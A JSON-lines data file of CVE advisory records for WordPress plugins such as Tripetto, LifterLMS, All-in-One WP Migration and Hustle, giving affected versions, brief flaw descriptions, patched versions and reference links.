{"CVE_ID":"CVE-2023-0233","slug":"activecampaign-subscription-forms","versionEndExcluding":"8.1.12","description":"The ActiveCampaign WordPress plugin before 8.1.12 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95c85fd-fa47-45bd-b8e0-a7f33edd7130\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95c85fd-fa47-45bd-b8e0-a7f33edd7130\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3575","slug":"quiz-master-next","versionEndExcluding":"8.1.11","description":"The Quiz And Survey Master WordPress plugin before 8.1.11 does not properly sanitize and escape question titles, which could allow users with the Contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f884688-2c0d-4844-bd31-ef7085edf112\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f884688-2c0d-4844-bd31-ef7085edf112\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-26524","slug":"quiz-master-next","versionImpact":"8.0.10","versionEndExcluding":"8.1.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in ExpressTech Quiz And Survey Master \u2013 Best Quiz, Exam and Survey Plugin for WordPress plugin <=\u00a08.0.10 versions.","recommendation":"Update to version 8.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quiz-master-next\\\/wordpress-quiz-and-survey-master-plugin-8-0-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quiz-master-next\\\/wordpress-quiz-and-survey-master-plugin-8-0-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5439","slug":"wp-photo-text-slider-50","versionImpact":"8.0","versionEndExcluding":"8.1","description":"The Wp photo text slider 50 plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 8.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985502\\\/wp-photo-text-slider-50#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985502\\\/wp-photo-text-slider-50#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-text-slider-50\\\/trunk\\\/wp-photo-text-slider-50.php?rev=2827206#L196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-text-slider-50\\\/trunk\\\/wp-photo-text-slider-50.php?rev=2827206#L196\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/515502b5-c344-4855-aff1-57833233c5d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/515502b5-c344-4855-aff1-57833233c5d2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12041","slug":"directorist","versionImpact":"8.0.12","versionEndExcluding":"8.1","description":"The Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 8.0.12 via the \/wp-json\/directorist\/v1\/users\/ endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including including usernames, email addresses, names, and more information about users.","recommendation":"Update to version 8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208874\\\/directorist\\\/tags\\\/8.0.9\\\/includes\\\/rest-api\\\/Version1\\\/class-users-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208874\\\/directorist\\\/tags\\\/8.0.9\\\/includes\\\/rest-api\\\/Version1\\\/class-users-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231156\\\/directorist\\\/tags\\\/8.1\\\/includes\\\/rest-api\\\/Version1\\\/class-users-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231156\\\/directorist\\\/tags\\\/8.1\\\/includes\\\/rest-api\\\/Version1\\\/class-users-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d9817ff-ca56-4941-97bc-f26defe7ddd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d9817ff-ca56-4941-97bc-f26defe7ddd5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13829","slug":"tripetto","versionImpact":"8.0.8","versionEndExcluding":"8.0.9","description":"The WordPress form builder plugin for contact forms, surveys and quizzes \u2013 Tripetto plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 8.0.8 via the 'attachments.php' file. This makes it possible for unauthenticated attackers to extract sensitive data including files uploaded via forms.","recommendation":"Update to version 8.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231968\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231968\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a938042-bad6-4fe0-8905-148d07a22996?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a938042-bad6-4fe0-8905-148d07a22996?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22295","slug":"tripetto","versionImpact":"8.0.6","versionEndExcluding":"8.0.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tripetto WordPress form builder plugin for contact forms, surveys and quizzes \u2013 Tripetto allows Stored XSS.This issue affects WordPress form builder plugin for contact forms, surveys and quizzes \u2013 Tripetto: from n\/a through 8.0.5.","recommendation":"Update to version 8.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/tripetto\\\/vulnerability\\\/wordpress-tripetto-plugin-8-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/tripetto\\\/vulnerability\\\/wordpress-tripetto-plugin-8-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2290","slug":"lifterlms","versionImpact":"8.0.1","versionEndExcluding":"8.0.2","description":"The LifterLMS \u2013 WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to Unauthenticated Post Trashing due to a missing capability check on the delete_access_plan function and the related AJAX calls in all versions up to, and including, 8.0.1. This makes it possible for unauthenticated attackers to change status to \"Trash\" for every published post, therefore limiting the availability of the website's content.","recommendation":"Update to version 8.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257328\\\/lifterlms\\\/trunk\\\/includes\\\/class.llms.ajax.handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257328\\\/lifterlms\\\/trunk\\\/includes\\\/class.llms.ajax.handler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f64dbf2-b75a-4a35-9b4e-413b8fd1fff0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f64dbf2-b75a-4a35-9b4e-413b8fd1fff0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13497","slug":"tripetto","versionImpact":"8.0.9","versionEndExcluding":"8.0.10","description":"The WordPress form builder plugin for contact forms, surveys and quizzes \u2013 Tripetto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via attachment uploads in all versions up to, and including, 8.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the uploaded file.","recommendation":"Update to version 8.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/attachments.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3251202%40tripetto%2Ftrunk&old=3231968%40tripetto%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3251202%40tripetto%2Ftrunk&old=3231968%40tripetto%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbbe006c-1afc-4c8b-a9f3-ffb21cdabb54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbbe006c-1afc-4c8b-a9f3-ffb21cdabb54?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45074","slug":"advanced-page-visit-counter","versionEndExcluding":"8.0.1","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Page Visit Counter Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress allows SQL Injection.This issue affects Advanced Page Visit Counter \u2013 Most Wanted Analytics Plugin for WordPress: from n\/a through 7.1.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-7-1-1-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/advanced-page-visit-counter\\\/wordpress-advanced-page-visit-counter-plugin-7-1-1-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13619","slug":"lifterlms","versionImpact":"8.0.0","versionEndExcluding":"8.0.1","description":"The LifterLMS  WordPress plugin before 8.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 8.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97a7e1a6-0fb3-49e9-86fc-ebb1d426fcca\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97a7e1a6-0fb3-49e9-86fc-ebb1d426fcca\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10803","slug":"fwdmsp","versionEndExcluding":"8.0","description":"The MP3 Sticky Player plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 8.0 via the content\/downloader.php file. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Please note the vendor released the patched version as the same version as the affected version.","recommendation":"Update to version 8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/mp3-sticky-player-wordpress-plugin\\\/7930491\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/mp3-sticky-player-wordpress-plugin\\\/7930491\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bcd4675-e930-44d9-8278-c4c9e877656a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bcd4675-e930-44d9-8278-c4c9e877656a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10942","slug":"all-in-one-wp-migration","versionImpact":"7.89","versionEndExcluding":"7.90","description":"The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 7.89 via deserialization of untrusted input in the 'replace_serialized_values' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must export and restore a backup in order to trigger the exploit.","recommendation":"Update to version 7.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/vendor\\\/servmask\\\/database\\\/class-ai1wm-database-utility.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/vendor\\\/servmask\\\/database\\\/class-ai1wm-database-utility.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253940\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253940\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0823d1d9-4f3b-4ac0-8cd1-ad208ebc325f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0823d1d9-4f3b-4ac0-8cd1-ad208ebc325f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4142","slug":"wp-ultimate-csv-importer","versionEndExcluding":"7.9.9","description":"The WP Ultimate CSV Importer plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 7.9.8 via the '->cus1' parameter. This allows authenticated attackers with author-level permissions or above, if the administrator previously grants access in the plugin settings, to execute code on the server. The author resolved this vulnerability by removing the ability for authors and editors to import files, please note that this means remote code execution is still possible for site administrators, use the plugin with caution.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db1bad2e-55df-40c5-9a3f-651858a19b42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db1bad2e-55df-40c5-9a3f-651858a19b42?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2455","slug":"bdthemes-element-pack","versionImpact":"7.9.0","versionEndExcluding":"7.9.1","description":"The Element Pack - Addon for Elementor Page Builder WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the widget wrapper link URL in all versions up to, and including, 7.9.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1903527e-d7d9-48a0-b59d-65ec5e14def2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1903527e-d7d9-48a0-b59d-65ec5e14def2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/feedback.elementpack.pro\\\/announcements#:~:text=Version%207.9.1%20Released\",\"name\":\"https:\\\/\\\/feedback.elementpack.pro\\\/announcements#:~:text=Version%207.9.1%20Released\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/feedback.elementpack.pro\\\/announcements\",\"name\":\"https:\\\/\\\/feedback.elementpack.pro\\\/announcements\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4772","slug":"newsletter","versionEndExcluding":"7.9.0","description":"The Newsletter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'newsletter_form' shortcode in versions up to, and including, 7.8.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2955097\\\/newsletter#file21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2955097\\\/newsletter#file21\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter\\\/tags\\\/7.8.9\\\/subscription\\\/subscription.php#L1653\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter\\\/tags\\\/7.8.9\\\/subscription\\\/subscription.php#L1653\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87da5300-1add-44fc-a3e0-e8912f946c84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87da5300-1add-44fc-a3e0-e8912f946c84?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0983","slug":"stylish-cost-calculator-premium","versionEndExcluding":"7.9.0","description":"The stylish-cost-calculator-premium WordPress plugin before 7.9.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Stored Cross-Site Scripting which could be used against admins when viewing submissions submitted through the Email Quote Form.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73353221-3e6d-44e8-bf41-55a0fe57d81f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73353221-3e6d-44e8-bf41-55a0fe57d81f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5488","slug":"wp-seopress","versionImpact":"7.8","versionEndExcluding":"7.9","description":"The SEOPress  WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.","recommendation":"Update to version 7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28507376-ded0-4e1a-b2fc-2182895aa14c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28507376-ded0-4e1a-b2fc-2182895aa14c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8852","slug":"all-in-one-wp-migration","versionImpact":"7.86","versionEndExcluding":"7.87","description":"The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.86 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information such as full paths contained in the exposed log files.","recommendation":"Update to version 7.87, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4901d9d-7b37-40d5-a42b-59c80bbbe8ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4901d9d-7b37-40d5-a42b-59c80bbbe8ff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/tags\\\/7.86\\\/functions.php#L297\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/tags\\\/7.86\\\/functions.php#L297\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168605%40all-in-one-wp-migration&new=3168605%40all-in-one-wp-migration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168605%40all-in-one-wp-migration&new=3168605%40all-in-one-wp-migration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9162","slug":"all-in-one-wp-migration","versionImpact":"7.86","versionEndExcluding":"7.87","description":"The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to arbitrary PHP Code Injection due to missing file type validation during the export in all versions up to, and including, 7.86. This makes it possible for authenticated attackers, with Administrator-level access and above, to create an export file with the .php extension on the affected site's server, adding an arbitrary PHP code to it, which may make remote code execution possible.","recommendation":"Update to version 7.87, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d97c3379-56c9-4261-9a70-3119ec121a40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d97c3379-56c9-4261-9a70-3119ec121a40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/controller\\\/class-ai1wm-backups-controller.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/controller\\\/class-ai1wm-backups-controller.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/controller\\\/class-ai1wm-export-controller.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-migration\\\/trunk\\\/lib\\\/controller\\\/class-ai1wm-export-controller.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2024-9162\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2024-9162\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/CVE-2024-9162\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/CVE-2024-9162\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10579","slug":"wordpress-popup","versionImpact":"7.8.5","versionEndExcluding":"7.8.6","description":"The Hustle \u2013 Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the preview_module() function in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view unpublished forms.","recommendation":"Update to version 7.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/tags\\\/7.8.5\\\/inc\\\/hustle-modules-common-admin-ajax.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/tags\\\/7.8.5\\\/inc\\\/hustle-modules-common-admin-ajax.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/trunk\\\/inc\\\/hustle-modules-common-admin-ajax.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/trunk\\\/inc\\\/hustle-modules-common-admin-ajax.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd96d9c-c1ab-4a53-a52a-9fc2541482f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd96d9c-c1ab-4a53-a52a-9fc2541482f2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10580","slug":"wordpress-popup","versionImpact":"7.8.5","versionEndExcluding":"7.8.6","description":"The Hustle \u2013 Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized form submissions due to a missing capability check on the submit_form() function in all versions up to, and including, 7.8.5. This makes it possible for unauthenticated attackers to submit unpublished forms.","recommendation":"Update to version 7.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/tags\\\/7.8.5\\\/inc\\\/front\\\/hustle-module-front-ajax.php#L251\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/tags\\\/7.8.5\\\/inc\\\/front\\\/hustle-module-front-ajax.php#L251\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196639\\\/wordpress-popup\\\/tags\\\/7.8.6\\\/inc\\\/front\\\/hustle-module-front-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196639\\\/wordpress-popup\\\/tags\\\/7.8.6\\\/inc\\\/front\\\/hustle-module-front-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b2f8726-c4c4-4ed6-aa8d-4412cf5be061?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b2f8726-c4c4-4ed6-aa8d-4412cf5be061?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12596","slug":"lifterlms","versionImpact":"7.8.5","versionEndExcluding":"7.8.6","description":"The LifterLMS \u2013 WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to arbitrary post deletion due to a missing capability check on the 'llms_delete_cert' action in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.","recommendation":"Update to version 7.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208662\\\/lifterlms\\\/trunk\\\/includes\\\/abstracts\\\/llms-abstract-controller-user-engagements.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208662\\\/lifterlms\\\/trunk\\\/includes\\\/abstracts\\\/llms-abstract-controller-user-engagements.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208662\\\/lifterlms\\\/trunk\\\/includes\\\/controllers\\\/class.llms.controller.certificates.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208662\\\/lifterlms\\\/trunk\\\/includes\\\/controllers\\\/class.llms.controller.certificates.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e75a03b-7552-4228-a4d0-13c78d20f6d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e75a03b-7552-4228-a4d0-13c78d20f6d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
